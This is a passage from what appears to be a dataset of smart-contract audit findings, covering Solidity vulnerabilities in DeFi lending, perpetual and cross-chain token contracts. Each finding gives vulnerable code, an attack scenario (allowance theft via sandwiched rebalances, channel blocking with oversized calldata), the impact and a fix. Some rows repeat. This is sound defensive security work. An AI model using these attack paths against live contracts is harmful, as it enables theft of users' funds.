NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n" +Loan is rollable by default,medium,"Making the loan rollable by default gives an unfair early advantage to the borrowers.\\nWhen clearing a new loan, the flag of `rollable` is set to true by default:\\n```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n\\nThis means a borrower can extend the loan anytime before the expiry:\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n```\\n\\nIf the lenders do not intend to allow rollable loans, they should separately toggle the status to prevent that:\\n```\\n function toggleRoll(uint256 loanID) external returns (bool) {\\n // rest of code\\n loan.rollable = !loan.rollable;\\n // rest of code\\n }\\n```\\n\\nI believe it gives an unfair advantage to the borrower because they can re-roll the loan before the lender's transaction forbids this action.",I believe `rollable` should be set to false by default or at least add an extra function parameter to determine the initial value of this status.,"Lenders who do not want the loans to be used more than once, have to bundle their transactions. Otherwise, it is possible that someone might roll their loan, especially if the capital requirements are not huge because anyone can roll any loan.","```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n" +Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom,high,"Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom\\n```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n",Consider using safeTransfer/safeTransferFrom consistently.,"If the token send fails, it will cause a lot of serious problems. For example, in the clear function, if debt token is ZRX, the lender can clear request without providing any debt token.","```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n" +Fully repaying a loan will result in debt payment being lost,high,"When a `loan` is fully repaid the `loan` `storage` is deleted. Since `loan` is a `storage` reference to the `loan`, `loan.lender` will return `address(0)` after the `loan` has been deleted. This will result in the `debt` being transferred to `address(0)` instead of the lender. Some ERC20 tokens will revert when being sent to `address(0)` but a large number will simply be sent there and lost forever.\\n```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n\\nIn `Cooler#repay` the `loan` storage associated with the loanID being repaid is deleted. `loan` is a storage reference so when `loans[loanID]` is deleted so is `loan`. The result is that `loan.lender` is now `address(0)` and the `loan` payment will be sent there instead.","Send collateral/debt then delete:\\n```\\n- if (repaid == loan.amount) delete loans[loanID];\\n+ if (repaid == loan.amount) {\\n+ debt.transferFrom(msg.sender, loan.lender, loan.amount);\\n+ collateral.transfer(owner, loan.collateral);\\n+ delete loans[loanID];\\n+ return;\\n+ }\\n```\\n",Lender's funds are sent to `address(0)`,"```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n" +No check if Arbitrum L2 sequencer is down in Chainlink feeds,medium,"Using Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.\\n```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n",Issue No check if Arbitrum L2 sequencer is down in Chainlink feeds,The impact depends on the usage of the GLP. If it is used as part of the collateral for lenders:\\nUsers can get better borrows if the price is above the actual price\\nUsers can avoid liquidations if the price is under the actual price,"```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n" +GMX Reward Router's claimForAccount() can be abused to incorrectly add WETH to tokensIn,medium,"When `claimFees()` is called, the Controller automatically adds WETH to the user's account. However, in the case where no fees have accrued yet, there will not be WETH withdrawn. In this case, the user will have WETH added as an asset in their account, while they won't actually have any WETH holdings.\\nWhen a user calls the GMX Reward Router's `claimFees()` function, the RewardRouterController confirms the validity of this call in the `canCallClaimFees()` function:\\n```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n\\nThis function assumes that any user calling `claimFees()` will always receive `WETH`. However, this is only the case if their stake has been accruing.\\nImagine the following two actions are taken in the same block:\\nDeposit assets into GMX staking\\nCall claimFees()\\nThe result will be that `claimFees()` returns no `WETH`, but `WETH` is added to the account's asset list.\\nThe same is true if a user performs the following three actions:\\nCall claimFees()\\nWithdraw all ETH from the WETH contract\\nCall claimFees() again","The best way to solve this is actually not at the Controller level. It's to solve the issue of fake assets being added once and not have to worry about it on the Controller level in the future.\\nThis can be accomplished in `AccountManager.sol#_updateTokensIn()`. It should be updated to only add the token to the assets list if it has a positive balance, as follows:\\n```\\nfunction _updateTokensIn(address account, address[] memory tokensIn)\\n internal\\n{\\n uint tokensInLen = tokensIn.length;\\n for(uint i; i < tokensInLen; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false)\\n// Add the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false && IERC20(token).balanceOf(account) > 0)\\n IAccount(account).addAsset(tokensIn[i]);\\n }\\n}\\n```\\n\\nHowever, `_updateTokensIn()` is currently called before the function is executed in `exec()`, so that would need to be changed as well:\\n```\\nfunction exec(address account, address target, uint amt, bytes calldata data) external onlyOwner(account) {\\n bool isAllowed;\\n address[] memory tokensIn;\\n address[] memory tokensOut;\\n (isAllowed, tokensIn, tokensOut) = controller.canCall(target, (amt > 0), data);\\n if (!isAllowed) revert Errors.FunctionCallRestricted();\\n// Remove the line below\\n _updateTokensIn(account, tokensIn);\\n (bool success,) = IAccount(account).exec(target, amt, data);\\n if (!success)\\n revert Errors.AccountInteractionFailure(account, target, amt, data);\\n// Add the line below\\n _updateTokensIn(account, tokensIn);\\n _updateTokensOut(account, tokensOut);\\n if (!riskEngine.isAccountHealthy(account))\\n revert Errors.RiskThresholdBreached();\\n}\\n```\\n\\nWhile this fix does require changing a core contract, it would negate the need to worry about edge cases causing incorrect accounting of tokens on any future integrations, which I think is a worthwhile trade off.\\nThis accuracy is especially important as Sentiment becomes better known and integrated into the Arbitrum ecosystem. While I know that having additional assets doesn't cause internal problems at present, it is hard to predict what issues inaccurate data will cause in the future. Seeing that Plutus is checking Sentiment contracts for their whitelist drove this point home — we need to ensure the data stays accurate, even in edge cases, or else there will be trickle down problems we can't currently predict.","A user can force their account into a state where it has `WETH` on the asset list, but doesn't actually hold any `WETH`.\\nThis specific Impact was judged as Medium for multiple issues in the previous contest:","```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n" +PerpDespository#reblance and rebalanceLite can be called to drain funds from anyone who has approved PerpDepository,high,"PerpDespository#reblance and rebalanceLite allows anyone to specify the account that pays the quote token. These functions allow a malicious user to abuse any allowance provided to PerpDirectory. rebalance is the worst of the two because the malicious user could sandwich attack the rebalance to steal all the funds and force the unsuspecting user to pay the `shortfall`.\\n```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n\\n`rebalance` is an unpermissioned function that allows anyone to call and `rebalance` the PNL of the depository. It allows the caller to specify the an account that passes directly through to `_rebalanceNegativePnlWithSwap`\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n // @audit this uses user supplied swap parameters which can be malicious\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96,\\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n int256 shortFall = int256(\\n quoteAmount.fromDecimalToDecimal(18, ERC20(quoteToken).decimals())\\n ) - int256(quoteAmountOut);\\n if (shortFall > 0) {\\n // @audit shortfall is taken from account specified by user\\n IERC20(quoteToken).transferFrom(\\n account,\\n address(this),\\n uint256(shortFall)\\n );\\n } else if (shortFall < 0) {\\n // rest of code\\n }\\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\n`_rebalanceNegativePnlWithSwap` uses both user specified swap parameters and takes the shortfall from the account specified by the user. This is where the function can be abused to steal funds from any user that sets an allowance for this contract. A malicious user can sandwich attack the swap and specify malicious swap parameters to allow them to steal the entire rebalance. This creates a large shortfall which will be taken from the account that they specify, effectively stealing the funds from the user.\\nExample: Any `account` that gives the depository allowance can be stolen from. Imagine the following scenario. The multisig is going to rebalance the contract for 15000 USDC worth of ETH and based on current market conditions they are estimating that there will be a 1000 USDC shortfall because of the difference between the perpetual and spot prices (divergences between spot and perpetual price are common in trending markets). They first approve the depository for 1000 USDC. A malicious user sees this approval and immediately submits a transaction of their own. They request to rebalance only 1000 USDC worth of ETH and sandwich attack the swap to steal the rebalance. They specify the multisig as `account` and force it to pay the 1000 USDC shortfall and burn their entire allowance, stealing the USDC.","PerpDespository#reblance and rebalanceLite should use msg.sender instead of account:\\n```\\n function rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n- address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n- account \\n+ msg.sender\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n```\\n",Anyone that gives the depository allowance can easily have their entire allowance stolen,"```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n" +USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralized,high,"PerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.",Allow all USDC now deposited into the insurance fund to be redeemed 1:1,UDX will become undercollateralized and the ecosystem will spiral out of control,"```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n" +PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extracted,high,"PerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.","I recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at anytime. If it is desired to make it a constant then it should at least be changed from 15 to 900.",The mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.,"```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n" +PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error,medium,"PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to situation when netAssetDeposits variable will be seting to negative value which will revert tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeem his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.","As you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.",User can't redeem all his UXD tokens.,"```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n" +Malicious user can use an excessively large _toAddress in OFTCore#sendFrom to break layerZero communication,high,"By default layerZero implements a blocking behavior, that is, that each message must be processed and succeed in the order that it was sent. In order to circumvent this behavior the receiver must implement their own try-catch pattern. If the try-catch pattern in the receiving app ever fails then it will revert to its blocking behavior. The _toAddress input to OFTCore#sendFrom is calldata of any arbitrary length. An attacker can abuse this and submit a send request with an excessively large _toAddress to break communication between network with different gas limits.\\n```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n\\nThe _toAddress input to OFTCore#sendFrom is a bytes calldata of any arbitrary size. This can be used as follows to break communication between chains that have different block gas limits.\\nExample: Let's say that an attacker wishes to permanently block the channel Arbitrum -> Optimism. Arbitrum has a massive gas block limit, much higher than Optimism's 20M block gas limit. The attacker would call sendFrom on the Arbitrum chain with the Optimism chain as the destination. For the _toAddress input they would use an absolutely massive amount of bytes. This would be packed into the payload which would be called on Optimism. Since Arbitrum has a huge gas limit the transaction would send from the Arbitrum side but it would be so big that the transaction could never succeed on the Optimism side due to gas constraints. Since that nonce can never succeed the communication channel will be permanently blocked at the Optimism endpoint, bypassing the nonblocking behavior implemented in the OFT design and reverting to the default blocking behavior of layerZero.\\nUsers can still send messages and burn their tokens from Arbitrum -> Optimism but the messages can never be received. This could be done between any two chain in which one has a higher block gas limit. This would cause massive loss of funds and completely cripple the entire protocol.","Limit the length of _toAddress to some amount (i.e. 256 bytes) as of right now EVM uses 20 bytes address and Sol/Aptos use 32 bytes address, so for right now it could be limited to 32 bytes.\\n```\\n function sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n+ require(_toAddress.length <= maxAddressLength); \\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n }\\n```\\n",Massive loss of user funds and protocol completely crippled,"```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n" +RageTrade senior vault USDC deposits are subject to utilization caps which can lock deposits for long periods of time leading to UXD instability,high,"RageTrade senior vault requires that it maintains deposits above and beyond the current amount loaned to the junior vault. Currently this is set at 90%, that is the vault must maintain at least 10% more deposits than loans. Currently the junior vault is in high demand and very little can be withdrawn from the senior vault. A situation like this is far from ideal because in the even that there is a strong depeg of UXD a large portion of the collateral could be locked in the vault unable to be withdrawn.\\nDnGmxSeniorVault.sol\\n```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n\\nDnGmxSeniorVault.sol#beforeWithdraw is called before each withdraw and will revert if the withdraw lowers the utilization of the vault below a certain threshold. This is problematic in the event that large deposits are required to maintain the stability of UXD.",I recommend three safeguards against this:\\nMonitor the current utilization of the senior vault and limit deposits if utilization is close to locking positions\\nMaintain a portion of the USDC deposits outside the vault (i.e. 10%) to avoid sudden potential liquidity crunches\\nCreate functions to balance the proportions of USDC in and out of the vault to withdraw USDC from the vault in the event that utilization threatens to lock collateral,UXD may become destabilized in the event that the senior vault has high utilization and the collateral is inaccessible,"```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n" +USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralized,high,"PerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.",Allow all USDC now deposited into the insurance fund to be redeemed 1:1,UDX will become undercollateralized and the ecosystem will spiral out of control,"```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n" +PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extracted,high,"PerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.","I recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at anytime. If it is desired to make it a constant then it should at least be changed from 15 to 900.",The mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.,"```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n" +`rebalanceLite` should provide a slippage protection,medium,"Users can lose funds while rebalancing.\\nThe protocol provides two kinds of rebalancing functions - `rebalance()` and `rebalanceLite()`. While the function `rebalance()` is protected from an unintended slippage because the caller can specify `amountOutMinimum`, `rebalanceLite()` does not have this protection. This makes the user vulnerable to unintended slippage due to various scenarios.\\n```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n\\nEspecially, according to the communication with the PERP dev team, it is possible for the Perp's ClearingHouse to fill the position partially when the price limit is specified (sqrtPriceLimitX96). It is also commented in the Perp contract comments here.\\n```\\n /// @param sqrtPriceLimitX96 tx will fill until it reaches this price but WON'T REVERT\\n struct InternalOpenPositionParams {\\n address trader;\\n address baseToken;\\n bool isBaseToQuote;\\n bool isExactInput;\\n bool isClose;\\n uint256 amount;\\n uint160 sqrtPriceLimitX96;\\n }\\n```\\n\\nSo it is possible that the order is not placed to the full `amount`. As we can see in the #L626~#L628, the UXD protocol grabs the quote token of `amount` and deposits to the Perp's vault. And the unused `amount` will remain in the Perp vault while this is supposed to be returned to the user who called this rebalance 